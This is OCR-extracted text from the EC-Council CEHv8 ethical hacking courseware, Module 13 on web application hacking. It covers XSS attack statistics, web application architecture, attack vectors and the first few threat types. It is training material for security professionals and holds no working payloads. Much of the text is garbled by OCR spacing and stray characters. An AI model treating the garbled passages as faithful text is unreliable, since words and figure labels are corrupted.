Hacking web applications CEHv8 module 13

Hacking Web Applications
M o d u l e 1 3

Exam312-50 Certified Ethical HackerEthical Hacking and Countermeasures
H a c k in g W e b A p p lic a tio n s
M o d u l e 1 3
E n g in e e re d b y H ackers. P r e s e n te d b y P ro fe s s io n a ls .
a
CEH
E t h i c a l H a c k i n g a n d C o u n t e r m e a s u r e s v 8
M o d u l e 1 3 : H a c k i n g W e b A p p l i c a t i o n s
E x a m 3 1 2 - 5 0
Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil
All Rights Reserved. Reproduction isStrictly Prohibited.
Module 13 Page 1724

CEHS e c u r ity N e w s
S e c u r i t y N e w s
X S S A t t a c k s L e a d P a c k A s M o s t F r e q u e n t A t t a c k T y p e
S o u r c e : h t t p : / / w w w . d a r k r e a d i n g . c o m
S e c u r e c l o u d h o s t i n g c o m p a n y , F i r e H o s t , h a s t o d a y a n n o u n c e d t h e f i n d i n g s o f
it s l a t e s t w e b a p p l i c a t i o n a t t a c k r e p o r t , w h i c h p r o v i d e s s t a t i s t i c a l a n a ly s is o f t h e 1 5 m i l l i o n
c y b e r - a t t a c k s b l o c k e d b y its s e r v e r s in t h e US a n d E u r o p e d u r i n g Q 3 2 0 1 2 . T h e r e p o r t lo o k s a t
a t t a c k s o n t h e w e b a p p l i c a t i o n s , d a t a b a s e s a n d w e b s i t e s o f F i r e H o s t ' s c u s t o m e r s b e t w e e n J u ly
a n d S e p t e m b e r , a n d o f f e r s a n i m p r e s s i o n o f t h e c u r r e n t i n t e r n e t s e c u r i t y c l i m a t e as a w h o l e .
A m o n g s t t h e c y b e r - a t t a c k s r e g i s t e r e d in t h e r e p o r t , F i r e H o s t c a t e g o r i s e s f o u r a t t a c k t y p e s in
p a r t i c u l a r a s r e p r e s e n t i n g t h e m o s t s e r i o u s t h r e a t . T h e s e a t t a c k t y p e s a r e a m o n g F i r e H o s t 's
,S u p e r f e c t a ' a n d t h e y c o n s i s t o f C r o s s - s it e S c r i p t i n g (X SS ), D i r e c t o r y T r a v e r s a l s , S Q L I n j e c t i o n s ,
a n d C r o s s - s it e R e q u e s t F o r g e r y (C SR F ).
O n e o f t h e m o s t s i g n i f i c a n t c h a n g e s in a t t a c k t r a f f i c s e e n b y F i r e H o s t b e t w e e n Q 2 a n d Q 3 2 0 1 2
w a s a c o n s i d e r a b l e r is e in t h e n u m b e r o f c r o s s - s i t e a t t a c k s , in p a r t i c u l a r XSS a n d CSRF a t t a c k s
r o s e t o r e p r e s e n t 6 4 % o f t h e g r o u p in t h e t h i r d q u a r t e r (a 2 8 % i n c r e a s e d p e n e t r a t i o n ) . XSS is
n o w t h e m o s t c o m m o n a t t a c k t y p e in t h e S u p e r f e c t a , w i t h CSRF n o w in s e c o n d . F i r e H o s t ' s
s e r v e r s b l o c k e d m o r e t h a n o n e m i l l i o n XSS a t t a c k s d u r i n g t h i s p e r i o d a l o n e , a f i g u r e w h i c h r o s e
Module 13 Page 1725 Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

69% , fr o m 6 0 3 ,0 1 6 s e p a ra te a tta c k s in Q 2 t o 1 ,0 1 8 ,8 1 7 in Q3. CSRF a tta c k s re a c h e d s e co nd
p lace on th e S u p e rfe c ta a t 8 4 3 ,5 1 7 .
C ross-site a tta c k s a re d e p e n d e n t u p o n th e tr u s t d e v e lo p e d b e tw e e n site a nd user. XSS a tta c k s
in v o lv e a w e b a p p lic a tio n g a th e rin g m a lic io u s d a ta fr o m a u se r via a tr u s te d site (o fte n c o m in g
in th e fo r m o f a h y p e rlin k c o n ta in in g m a lic io u s c o n te n t), w h e re a s CSRF a tta c k s e x p lo it th e tr u s t
t h a t a site has f o r a p a rtic u la r us e r in s te a d . T hese m a lic io u s s e c u rity e x p lo its can also be used
t o steal s e n s itiv e in fo r m a tio n such as u s e r n a m e s , p a s s w o rd s a nd c re d it ca rd d e ta ils - w it h o u t
th e site o r user's k n o w le d g e .
T h e s e v e rity o f th e s e a tta c k s is d e p e n d e n t o n th e s e n s itiv ity o f th e d a ta h a n d le d by th e
v u ln e ra b le site a n d th is ran g e s f r o m p e rs o n a l d a ta fo u n d on social n e tw o r k in g sites, t o th e
fin a n c ia l a n d c o n fid e n tia l d e ta ils e n te r e d on e c o m m e rc e sites a m o n g s t o th e rs . A g re a t n u m b e r
o f o rg a n is a tio n s ha ve fa lle n v ic tim to such a tta c k s in re c e n t ye a rs in c lu d in g a tta c k s o n PayPal,
H o tm a il a n d eBay, th e la tte r fa llin g v ic tim t o a sin g le CSRF a tta c k in 2 0 0 8 w h ic h ta r g e te d 18
m illio n users o f its K o re a n w e b s ite . F u r th e r m o r e in S e p te m b e r th is y e a r, IT g ia n ts M ic r o s o ft and
G o o g le C h ro m e b o th ran e x te n s iv e p a tc h e s ta r g e te d a t s e c u rin g XSS fla w s , h ig h lig h tin g th e
p re v a le n c e o f th is g r o w in g o n lin e th r e a t.
"C ro ss-site a tta c k s a re a s e ve re th r e a t t o bu siness o p e ra tio n s , e s p e c ia lly if se rve rs a re n 't
p r o p e r ly p re p a r e d ," said C hris H in k le y, CISSP - a S e n io r S e c u rity E n g in e e r a t F ire H o st. "It's v ita l
t h a t a n y site d e a lin g w it h c o n fid e n tia l o r p riv a te u s e r d a ta ta k e s th e n e ce ssa ry p re c a u tio n s to
e n s u re a p p lic a tio n s re m a in p ro te c te d . L o c a tin g and fix in g a n y w e b s ite v u ln e r a b ilit ie s a n d fla w s
is a key s te p in e n s u rin g y o u r bu sin ess a n d y o u r c u s to m e rs , d o n 't fa ll v ic tim to an a tta c k o f th is
n a tu re . T h e c o n s e q u e n c e s o f w h ic h can be s ig n ific a n t, in te r m s o f b o th fin a n c ia l a nd
re p u ta tio n a l d a m a g e ."
T h e S u p e rfe c ta a tta c k tr a ffic fo r Q 3 2 0 1 2 can be b ro k e n d o w n as fo llo w s :
As w it h Q 2 2 0 1 2 , th e m a jo r ity o f a tta c k s F ire H o st b lo c k e d d u rin g th e th ir d c a le n d a r q u a r t e r o f
2 0 1 2 o rig in a te d in th e U n ite d S tates ( l l m i l l i o n / 74% ). T h e re has h o w e v e r , b e e n a g re a t s h ift in
th e n u m b e r o f a tta c k s o r ig in a tin g f r o m E u ro p e th is q u a rte r, as 17% o f all m a lic io u s a tta c k tr a ffic
seen by F ire H o s t c a m e fr o m th is re g io n . E u ro p e o v e r to o k S o u th e rn Asia (w h ic h w a s re s p o n s ib le
fo r 6%), t o b e c o m e th e se c o n d m o s t lik e ly o rig in o f m a lic io u s tra ffic .
V a rie d tr e n d s a m o n g th e S u p e rfe c ta a tta c k te c h n iq u e s are d e m o n s tr a te d b e tw e e n th is q u a r te r
a n d last:
D u rin g th e b u ild u p to th e h o lid a y season, e c o m m e r c e a c tiv ity ra m p s up d ra m a tic a lly and
c y b e r-a tta c k s t h a t ta r g e t w e b s ite users' c o n fid e n tia l d a ta are also lik e ly t o in c re a s e as a re s u lt.
As w e ll as cro ss-site a tta c k s, th e o th e r S u p e rfe c ta a tta c k ty p e s , SQL In je c tio n a n d D ire c to ry
T ra n s ve rs a l, still re m a in a s ig n ific a n t th r e a t d e s p ite a s lig h t re d u c tio n in fr e q u e n c y th is q u a rte r.
E c o m m e rc e b u sin esse s n e e d to be a w a re o f th e risks t h a t th is p e rio d m a y p re s e n t it t o its
s e c u rity , as T o d d G lea so n , D ire c to r o f T e c h n o lo g y a t F ire H o st e xp la in s, "Y o u 'd b e t t e r b e lie v e
t h a t h a cke rs w ill t r y and ta k e a d v a n ta g e o f a n y surges in h o lid a y s h o p p in g . T h e y w ill be d e v is in g
a n u m b e r o f w a y s th e y can ta k e a d v a n ta g e o f a n y w e b a p p lic a tio n v u ln e ra b ilitie s a n d w ill use
an a s s o r t m e n t o f d iffe r e n t a tta c k ty p e s a n d te c h n iq u e s to d o so. W h e n it's a m a t t e r o f
Module 13 Page 1726

c o n f i d e n t i a l d a t a a t r is k , i n c l u d i n g c u s t o m e r ' s f i n a n c i a l i n f o r m a t i o n - c r e d i t c a r d a n d d e b i t c a r d
d e t a i l s - t h e r e ' s n o r o o m f o r c o m p l a c e n c y . T h e s e o r g a n i s a t i o n s n e e d t o k n o w t h a t t h e r e ' s a n
i n c r e a s e d l i k e l i h o o d o f a t t a c k d u r i n g t h i s t i m e a n d it 's t h e i r r e s p o n s i b i l i t y t o t a k e t h e n e c e s s a r y
s t e p s t o s t o p s u c h a t t a c k s . "
Copyright © 2013 UBM Tech, A ll rights reserved
http://www.darkreading.com/5ecuritv/news/240009508/firehost-q3-web-application-report-xss-
attacks-lead-pack-as-most-frequent-attack-type.html
Module 13 Page 1727

M o d u le O b je c t iv e s CEH
J How Web Applications Work J Session Management Attack
J Web Attack Vectors J Attack Data Connectivity
J Web Application Threats J Attack Web App Client
J Web App Hacking Methodology J Attack Web Services
J Footprint Web Infrastructure ■ ^ J Web Application Hacking Tools
J Hacking W ebServers
/1‫־‬
J Countermeasures
J Analyze Web Applications J Web Application Security Tools
J Attack Authentication Mechanism J Web Application Firewall
J Attack Authorization Schemes J Web Application Pen Testing
Copyright © by EC-Cauactl. All Rights Reserved. Reproduction is Strictly Prohibited.
M o d u l e O b j e c t i v e s
T h e m a in o b je c tiv e o f th is m o d u le is t o s h o w th e v a rio u s kin d s o f v u ln e ra b ilitie s th a t
can be d is c o v e re d in w e b a p p lic a tio n s . T h e a tta c k s e x p lo itin g th e s e v u ln e ra b ilitie s a re also
h ig h lig h te d . T h e m o d u le s ta rts w it h a d e ta ile d d e s c rip tio n o f th e w e b a p p lic a tio n s . V a rio u s w e b
a p p lic a tio n th r e a ts a re m e n tio n e d . T h e h a c k in g m e t h o d o lo g y re ve a ls th e v a rio u s ste p s
in v o lv e d in a p la n n e d a tta c k . T h e v a rio u s to o ls t h a t a tta c k e rs use a re discussed t o e x p la in th e
w a y th e y e x p lo it v u ln e ra b ilitie s in w e b a p p lic a tio n s . T h e c o u n te r m e a s u r e s t h a t can be ta k e n to
t h w a r t a n y such a tta c k s a re also h ig h lig h te d . S e c u rity to o ls t h a t h e lp n e tw o r k a d m in is t r a t o r to
m o n it o r a n d m a n a g e th e w e b a p p lic a tio n are d e s c rib e d . Finally w e b a p p lic a tio n p e n te s t in g is
d iscussed.
This m o d u le fa m ilia riz e s y o u w ith :
Module 13 Page 1728

- Session M a n a g e m e n t A tta c k
S A tta c k D ata C o n n e c tiv ity
S A tta c k W e b A p p C lie n t
s A tta c k W e b S ervices
S W e b A p p lic a tio n H a ckin g T o o ls
S C o u n te rm e a s u re s
s W e b A p p lic a tio n S e c u rity T o o ls
s W e b A p p lic a tio n F ire w a ll
S W e b A p p lic a tio n Pen T e s tin g
H o w W e b A p p lic a tio n s W o r k
W e b A tta c k V e c to rs
W e b A p p lic a tio n T h re a ts
W e b A p p H a ckin g M e t h o d o lo g y
F o o tp r in t W e b In fra s tru c tu r e
H a ck in g W e b s e rv e rs
A n a ly z e W e b A p p lic a tio n s
A tta c k A u th e n tic a tio n M e c h a n is m
A tta c k A u th o r iz a tio n S ch e m e s
3 Page 1729 Ethical Hacking and Countermeasures Copyright © by EC‫־‬C0UI1Cil
A
£
A
A
A
Module

Copyright © by E & C oin a l. All Rights Reserved. Reproduction is Strictly Prohibited.
‫־‬ ‫־‬ ^ M o d u l e F l o w
W e b a p p lic a tio n s are th e a p p lic a tio n p ro g ra m s accessed o n ly w it h In te r n e t
c o n n e c tio n e n a b le d . T h e se a p p lic a tio n s use HTTP as t h e ir p r im a r y c o m m u n ic a t io n p r o t o c o l.
G e n e ra lly , th e a tta c k e rs ta r g e t th e s e a p p s fo r se v e ra l reasons. T h e y a re e x p o s e d t o v a rio u s
a tta c ks . For cle a r u n d e rs ta n d in g o f th e "h a c k in g w e b a p p lic a tio n s " w e d iv id e d th e c o n c e p t in to
v a rio u s s e ctio n s.
Q W e b A p p C o n c e p ts
Q W e b A p p T h re a ts
© H a ckin g M e t h o d o lo g y
Q W e b A p p lic a tio n H a ckin g T oo ls
© C o u n te rm e a s u re s
0 S e c u rity T o o ls
© W e b A p p Pen T e s tin g
Let us b e g in w it h th e W e b A p p c o n c e p ts .
Module 13 Page 1730

^ ^ W e b A p p P e n T e s t i n g W e b A p p C o n c e p ts
S e c u rity T o o ls W e b A p p T h re a ts
C o u n te rm e a s u r e s ^ H a c k in g M e t h o d o lo g y
W e b A p p lic a tio n H a c k in g T o o ls
T h is s e c t i o n i n t r o d u c e s y o u t o t h e w e b a p p l i c a t i o n a n d it s c o m p o n e n t s , e x p l a i n s h o w t h e w e b
a p p l i c a t i o n w o r k s , a n d its a r c h i t e c t u r e . I t p r o v i d e s i n s i g h t i n t o w e b 2 . 0 a p p l i c a t i o n , v u l n e r a b i l i t y
s t a c k s , a n d w e b a t t a c k v e c t o r s .
Module 13 Page 1731

CEH
Web Application Security
Statistics
Cross-Site Scripting
Information Leakage
Copyright © by E tC tin d l. All Rights Reserved. Reproduction is Strictly Prohibited.
f f W e b A p p l i c a t i o n S e c u r i t y S t a t i s t i c s
~ S ou rce : h tt p s : / / w w w . w h it e h a t s e c . c o m
A c c o rd in g t o th e W H IT E H A T s e c u rity w e b s ite sta tis tic s r e p o r t in 2 0 1 2 , it is c le a r th a t th e cross-
site s c rip tin g v u ln e ra b ilitie s are fo u n d o n m o r e w e b a p p lic a tio n s w h e n c o m p a r e d t o o th e r
v u ln e ra b ilitie s . F ro m th e g ra p h y o u can o b s e rv e t h a t in th e y e a r 2 0 1 2 , cro ss -site s c rip tin g
v u ln e ra b ilitie s a re th e m o s t c o m m o n v u ln e ra b ilitie s fo u n d in 55% o f th e w e b a p p lic a tio n s . O n ly
10% o f w e b a p p lic a tio n a tta c k s a re based o n in s u ffic ie n t se ssio n e x p ir a tio n v u ln e ra b ilitie s . In
o r d e r t o m in im iz e th e risks a ss o cia te d w it h cro ss -site s c rip tin g v u ln e ra b ilitie s in th e w e b
a p p lic a tio n s , y o u have t o a d o p t n e ce s sa ry c o u n te r m e a s u re s a g a in s t th e m .
Module 13 Page 1732

Cross-Site Scripting
Inform ation Leakage
Content Spoofing
16%
Insufficient Authorization
■ L Cross-Site Request Forgery
Brute Force
Predictable Resource Location
SQL Injection
10% Session Fixation
Insufficient Session Expiration
2010
W
O
■a>4
Q
aI—H
£
C
o
• H
0
■ H
a .
a
1
FIGURE 13.1: WHITEHAT SECURITY WEBSITE STATISTICS REPORT, 2012
Module 13 Page 1733

I n t r o d u c t i o n t o W e b A p p l i c a t i o n s C E H
T h o u g h w e b a p p lic a tio n s e n fo rc e c e rta in
s e c u rity p o licie s, th e y are v u ln e ra b le
to v a rio u s a tta c k s such as SQL
in je c tio n , cro ss-site s c rip tin g ,
session h ija c k in g , etc.
* ,
W e b a p p lic a tio n s p ro v id e an in te rfa c e b e tw e e n
e n d users a nd w e b se rve rs th ro u g h a set o f
w e b pages th a t are g e n e ra te d a t th e
se rver e nd o r c o n ta in s c rip t co d e to
be e xe cu te d d y n a m ic a lly w ith in
th e c lie n t w e b b ro w s e r
N e w w e b te c h n o lo g ie s such as
W e b 2 .0 p ro v id e m o re a tta c k
su rfa ce fo r w e b a p p lic a tio n
e x p lo ita tio n
C o p yrig h t © by E&C01nal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
W e b a p p lic a tio n s a n d W e b 2 .0
te c h n o lo g ie s a re in v a ria b ly u s e d to
s u p p o r t c ritic a l b u s in e s s fu n c tio n s
s u c h as C R M , S C M , e tc . a n d im p ro v e
b u s in e s s e ffic ie n c y
I n t r o d u c t i o n t o W e b A p p l i c a t i o n s
W eb applications are the application th a t run on the rem ote w eb server and send the
o u tp u t over the Internet. W eb 2.0 technologies are used by all the applications based on the
web-based servers such as com m unication w ith users, clients, th ird -p a rty users, etc.
A w eb application is com prised o f m any layers o f functiona lity. However, it is considered a
three-layered architecture consisting o f presentation, logic, and data layers.
The web architecture relies substantially on the technology popularized by the W orld W ide
W eb, H ypertext M arkup Language (HTML), and the prim ary tra n sp o rt m edium , e.g. Hyper Text
Transfer Protocol (HTTP). HTTP is the m edium o f com m unication betw een the server and the
client. Typically, it operates over TCP port 80, but it may also com m unicate over an unused
port.
W eb applications provide an interface betw een end users and w eb servers through a set of
w eb pages th a t are generated at the server end or contain script code to be executed
dynam ically w ith in the client w eb browser.
Some o f the popular w eb servers present today are M icrosoft IIS, Apache Software
Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun One. Resources
are called U niform Resource Identifiers (URIs), and they may either be static pages or contain
dynam ic content. Since HTTP is stateless, e.g., the proto co l does not m aintain a session state,
Module 13 Page 1734

the requests fo r resources are treated as separate and unique. Thus, the inte g rity o f a link is not
m aintained w ith the client.
Cookies can be used as tokens, w hich servers hand over to clients to allow access to websites.
However, cookies are not perfect fro m a security point o f view because they can be copied and
stored on the client's local hard disk, so th a t users do not have to request a token fo r each
query. Though w eb applications enforce certain security policies, they are vulnerable to various
attacks such as SQL injection, cross-site scripting, session hijacking, etc. Organizations rely on
w eb applications and W eb 2.0 technologies to support key business processes and im prove
perform ance. New w eb technologies such as W eb 2.0 provide m ore attack surface fo r w eb
application e xp lo ita tio n .
Attackers use d iffe re n t types o f vulnerabilities th a t can be discovered in w eb applications and
exploit them to com prom ise w eb applications. Attackers also use tools to launch attacks on
w eb applications.
Module 13 Page 1735

W e b A p p l i c a t i o n C o m p o n e n t s C
Urtifwd
E H
itfcMjl NMhM
1
IS
C o p yrig h t © by E&Coinal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
^ W e b A p p l i c a t i o n C o m p o n e n t s
The com ponents o f w eb applications are listed as follow s
Login: M ost o f the w ebsites allow a u th e n tic users to access the application by means o f login. It
means th a t to access the service or content offered by the w eb application user needs to
subm it his/her usernam e and password. Example gm ail.com
The Web Server: It refers to either softw are or hardw are intended to deliver web content th a t
can be accessed through the Internet. An exam ple is the w eb pages served to the w eb brow ser
by the web server.
Session Tracking Mechanism: Each w eb application has a session tracking m echanism . The
session can be tracked by using cookies, URL rew riting, or Secure Sockets Layer (SSL)
inform ation.
User Permissions: W hen you are not allow ed to access the specified web page in which you are
logged in w ith user permissions, you may redirect again to the login page or to any oth e r page.
The Application Content: It is an interactive program th a t accepts w eb requests by clients and
uses the param eters th a t are sent by the w eb brow ser fo r carrying out certain functions.
Data Access: Usually the w eb pages w ill be contacting w ith each oth e r via a data access library
in which all the database details are stored.
Module 13 Page 1736

The Data Store: It is a w ay to the im p o rta n t data th a t is shared and synchronized betw een the
children/thre ats. This stored inform ation is quite im p o rta n t and necessary fo r higher levels of
the application fra m e w o rk. It is not m andatory th a t the data store and the w eb server are on
the same netw ork. They can be in contact or accessible w ith each other through the netw ork
connection.
Role-level System Security
Application Logic: Usually w eb applications are divided into tiers o f w hich the application logic
is the m iddle tier. It receives the request from the w eb brow ser and gives it services
accordingly. The services offered by the application logic include asking questions and giving
the latest updates against the database as w ell as generating a user interface.
Logout: An individual can shut dow n or log out of the w eb application or brow ser so th a t the
session and the application associated w ith it end. The application ends e ith e r by taking the
initiative by the application logic or by autom atically ending w hen the servlet session tim es out.
Module 13 Page 1737

H o w W e b A p p l i c a t i o n s W o r k C E H
SELECT * fr o m new s w h e re i d = 6 3 2 9
O u tp u t
ID Topic News
6329 Tech CNN
C o p yrig h t © by E&C01nal. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
H o w W e b A p p l i c a t i o n s W o r k
W henever som eone clicks or types in the brow ser, im m ediately the requested w ebsite
or content is displayed on the screen of the com puter, but w hat is the m echanism behind this?
This is the step-by-step process th a t takes place once a user sends a request fo r particular
content or a w ebsite w here m ultiple com puters are involved.
The w eb application m odel is explained in three layers. The first layer deals w ith the user input
through a web brow ser or user interface. The second layer contains JSP (Java servlets) or ASP
(Active Server Pages), the dynam ic content generation technolo gy tools, and the last layer
contains the database fo r storing custom er data such as user names and passwords, credit card
details, etc. or oth e r related inform ation.
Let's see how the user triggers the initial request through the brow ser to the w eb application
server:
© First the user types the w ebsite name or URL in the brow ser and the request is sent to
the w eb server.
© On receiving the request ,the w eb server checks the file extension:
© If the user requests a sim ple w eb page w ith an HTM or HTML extension, the web
server processes the request and sends the file to the user's browser.
Module 13 Page 1738

© If the user requests a w eb page w ith the extension CFM, CFML, or CFC, then the
request m ust be processed by the w eb application server.
Therefore, the web server passes the user's request to the w eb application server.
The user's request is now processed by the w eb applicatio n server. In order to
process the user's request, the w eb server accesses the database placed at the th ird
layer to perform the requested task by updating or retrieving the inform ation stored
on the database. Once done processing the request, web application server sends
the results to the w eb server, w hich in tu rn sends the results to the user's browser.
User Login Form Internet Firewall Web Server
FIGURE 1 3.2 : W o rk in g o f W e b A p p lic a tio n
Module 13 Page 1739

W e b A p p l i c a t i o n A r c h i t e c t u r e C E H
y ^ lln t e m e r N
( W eb
Clients
Services
Business Layer
A p p lica tion Server
Business
Logic
J2EE .NET COM
XCode C++ COM+
Legacy Application
Data Access
‫ה‬Proxy Server,
Cache
P re se n ta tio n Layer
Firewall
HTTP R equest Parser
A u th e n tication
and Login
Resource
H andler
Servlet
C ontainer
Copyright © by E&Coinal. All Rights Reserved. Reproduction is Strictly Prohibited.
W e b A p p l i c a t i o n A r c h i t e c t u r e
All w eb applications execute w ith the help o f the w eb brow ser as a support client. The
w eb applications use a group o f server-side scripts (ASP, PHP, etc.) and client-side scripts
(HTML, JavaScript, etc.) to execute the application. The inform ation is presented by using the
client-side script and the hardw are tasks such as storing and gathering required data by the
server-side script.
In the follow ing architecture, the clients uses d iffe re n t devices, w eb browsers, and external
w eb services w ith the Internet to get the application executed using d iffe re n t scripting
languages. The data access is handled by the database layer using cloud services and a
database server.
Module 13 Page 1740

Business Layer
Application Server
J2EE .NET COM
Business
logic
XCode C+♦ COM♦
legacy Application
Data Access
Database Layer
Cloud Services
Database Server
Clients
W eb Browser‫ו‬——,
V•*'‫׳‬ ‫י‬ ‫ד‬ ‫ג‬ ‫ל‬ •‫י‬_ _ _U S
^External™1
W eb
S«rvic*1
Presentation
layer
Fla sh .
S ilv e r lljh t.
Ja va S crip (
Smart Phonas,
Web
Appliance
f
Proxy Server,
Cache
Web Server
Prssantation Layer
Firewall
HTTP Request Parser
Servlet Resource Authentication
Container Handler and Login
FIGURE 1 3 .3 : W e b A p p lic a tio n A rc h ite c tu re
Module 13 Page 1741

W e b 2 . 0 A p p l i c a t i o n s C E H
C«rt1fW4 itfciul NMkM
J W e b 2 .0 refers to a n e w g e n e ra tio n o f W e b a p p lic a tio n s th a t p ro v id e an in fra s tru c tu re fo r m o re d y n a m ic
user p a rtic ip a tio n , social in te ra c tio n a nd c o lla b o ra tio n
Blogs (W ordpress)
Q Advanced gaming
ODynamic as opposed to static site content
ORSS-generated syndication
O Social netw o rking sites (Flickr,
' Facebook, del.cio.us)
v‫״‬ ..rid'‫'׳׳‬«»?
' Q Mash-ups (Emails, IMs, Electronic
f payment systems)
OW ikis and oth e r collaborative applications
Q Google Base and other free Web services
(Google Maps)
o o
New technologies like AJAX (Gmail, YouTube) Q
M obile application (iPhone) O
Flash rich interface websites O
Fram eworks (Yahool Ul
Library, jQ uery)
Cloud computing websites like W
(amazon.com) ^
Interactive encyclopedias and dictionaries O
ine office software (Google Docs and Microsoft light)
Ease o f data creation, m odification, or
deletion by individual users
C o p yrig h t © by E&C01nal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
W e b 2 . 0 A p p l i c a t i o n s
W eb 2.0 refers to a new generation o f w eb applications th a t provide an in fra stru ctu re
fo r m ore dynam ic user participation, social interaction, and collaboration. It offers various
features such as:
© Advanced gam ing
© Dynamic as opposed to static site content
© RSS-generated syndication
© Social netw orking sites (Flickr, Facebook, del.cio.us)
© M ash-ups (emails, IMs, electronic paym ent systems)
© W ikis and oth e r collaborative applications
© Google Base and oth e r free w eb services (Google Maps)
© Ease o f data creation, m odification, or deletion by individual users
© Online office softw are (Google Docs and M icrosoft Light)
© Interactive encyclopedias and dictionaries
© Cloud com puting w ebsites such as Am azon.com
Module 13 Page 1742

6 Fram eworks (Yahoo! Ul Library, j Query)
© Flash-rich interface websites
Q M obile application (iPhone)
Q New technologies like AJAX (Gmail, YouTube)
© Blogs (W ordpress)
Module 13 Page 1743

C E HV u l n e r a b i l i t y S t a c k
_
C u s to m W e b A p p lic a tio n s
B _
B u s in e s s Logic F la w s
T e c h n ic a l V u ln e ra b ilitie s
T h ird P a rty C o m p o n e n ts
E l E O p e n S o u rc e / C o m m e rc ia l
f ^ ‫־‬w r O ra c le / M yS Q L / M S SQL
A p a c h e / M ic r o s o ft IIS
Apache
W in d o w s / L in u x
/OSX
R o u te r / S w itc h
IPS / IDS
D a ta b a s e
W e b S e rv e r
O p e ra tin g S y s te m
N e tw o r k
S e c u rity
V u l n e r a b i l i t y S t a c k
i f - The w eb applications are m aintained and accessed through various levels th a t include:
custom w eb applications, th ird -p a rty com ponents, databases, w eb servers, operating systems,
netw orks, and security. All the m echanism s or services em ployed at each level help the user in
one or the oth e r way to access the w eb application securely. W hen talking about web
applications, security is a critical com ponent to be considered because w eb applications are a
m ajor sources o f attacks. The follow ing v u ln e ra b ility stack shows the levels and the
corresponding elem ent/m echanism /service em ployed at each level th a t makes the web
applications vulnerable:
Module 13 Page 1744

Exam312-50 Certified Ethical Hacker
Business Logic Flaws
Technical Vulnerabilities
Open Source / Commercial
Oracle / MySQL / MS SQL
Apache / Microsoft IIS
Windows / Linux
/O S X
Router / Switch
IPS /ID S
Ethical Hacking and Countermeasures
Custom Web Applications
Third Party Components
Security
FIGURE 1 3 .4 : V u ln e ra b ility S tack
Module 13 Page 1745

-
C E H
(
‫־‬ ‫־‬ ‫־‬
W e b A t t a c k V e c t o r s
A n a tta c k v e c to r is a p a th o r m e a n s b y w h ic h a n a tta c k e r ca n g a in
w a ccess to c o m p u te r o r n e tw o r k re s o u rc e s in o r d e r to d e liv e r an
a tta c k p a y lo a d o r c a u s e a m a lic io u s o u tc o m e
A tta c k v e c to rs in c lu d e p a r a m e te r m a n ip u la tio n , X M L p o is o n in g ,
c lie n t v a lid a tio n , s e rv e r m is c o n fig u ra tio n , w e b s e rv ic e r o u tin g
issu e s, a n d c ro s s -s ite s c rip tin g
S e c u rity c o n tr o ls n e e d to b e u p d a te d c o n tin u o u s ly as th e a tta c k
v e c to rs ke e p c h a n g in g w ith re s p e c t to a ta rg e t o f a tta c k
W e b A t t a c k V e c t o r s
An attack vector is a m ethod o f entering into to unauthorized systems to perform ing
m alicious attacks. Once the attacker gains access into the system or the netw ork he or she
delivers an attack payload or causes a m alicious outcom e. No protection m ethod is com pletely
a tta ck-p ro o f as attack vectors keep changing and evolving w ith new technological changes.
Examples o f various types o f attack vectors:
© P aram eter m an ip u la tio n : Providing the w rong input value to the w eb services by the
attacker and gaining the control over the SQL, LDAP, XPATH, and shell com m ands.
W hen the incorrect values are provided to the w eb services, then they become
vulnerable and are easily attacked by w eb applications running w ith w eb services.
0 XML poisoning: Attackers provide m anipulated XML docum ents th a t w hen executed can
disturb the logic o f parsing m ethod on the server. W hen huge XMLs are executed at the
application layer, then they can be easily be com prom ised by the attacker to launch his
or her attack and gather inform ation.
© Client va lid a tio n : M ost client-side validation has to be supported by server-side
authentication. The AJAX routines can be easily m anipulated, which in tu rn makes a way
fo r attackers to handle SQL injection, LDAP injection, etc. and negotiate the web
application's key resources.
Module 13 Page 1746

0 Server M isconfiguration: The attacker exploits the vulnerabilities in the w eb servers and
tries to break the validation m ethods to get access to the co n fid e n tia l data stored on
the servers.
0 Web service routing issues: The SOAP messages are perm itted to access d iffe re n t nodes
on the Internet by the W S-Routers. The exploited interm ediate nodes can give access to
the SOAP messages th a t are com m unicated betw een tw o endpoints.
0 Cross-site scripting: W henever any infected JavaScript code is executed, then the
targeted browsers can be exploited to gather inform ation by the attacker.
Module 13 Page 1747

C o p yrig h t © by E&Coinal.A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
‫־‬ ‫־‬ ^ M o d u l e F l o w
W eb applications are targeted by attackers fo r various reasons. The first issue is
quality o f the source code as related to security is poor and another issue is an application w ith
"com plex setup." Due to these loopholes, attackers can easily launch attacks by e xploiting
them . Now we w ill discuss the threats associated w ith w eb applications.
^ Web App Pen Testing Web App Concepts
m Security Tools W eb App Threats
J k Countermeasures e‫־‬‫־‬‫־‬s Hacking Methodology
1S>
Web Application Hacking Tools
B#
Module 13 Page 1748

This section lists and explains the various w eb application th re a ts such as p aram eter/form
tam pering, injection attacks, cross-site scripting attacks, DoS attacks, session fixation attacks,
im proper e rror handling, etc.
Ethical Hacking and Countermeasures Exam312-50 Certified Ethical Hacker
Module 13 Page 1749

W e b A p p l i c a t i o n T h r e a t s 1 ‫־‬ C E H
UrtiM Itkml Mstkm
B ro ke n A c c o u n t
M a n a g e m e n t
In fo rm a tio n
Leakage
Im p ro p e r
E rro r H a n d lin gS to ra g e
C oo kie
P o iso n in g
Cop> ■ight © by EC -C a uacil. A ll R ights R eserved. R ep ro d u ctio n is S trictly Pro h ibited .
W e b A p p l i c a t i o n T h r e a t s - 1
W eb application threats are not lim ited to attacks based on URL and port80. Despite
using ports, protocols, and the OSI layer, the integrity o f m ission-critical applications m ust be
protected from possible fu tu re attacks. Vendors w ho w ant to protect th e ir products'
applications m ust be able to deal w ith all m ethods o f attack.
The various types o f w eb application threats are as follow s:
C o o k i e P o i s o n i n g
By changing the inform ation inside the cookie, attackers bypass the a u th e n tica tio n
process and once they gain control over the netw ork, they can either m odify the
content, use the system fo r the m alicious attack, or steal in fo rm a tio n from the user's system.
D i r e c t o r y T r a v e r s a l
Attackers e xp lo it HTTP by using d ire cto ry traversal and they w ill be able to access
restricted directories; they execute com m ands outside o f the w eb server's root
directory.
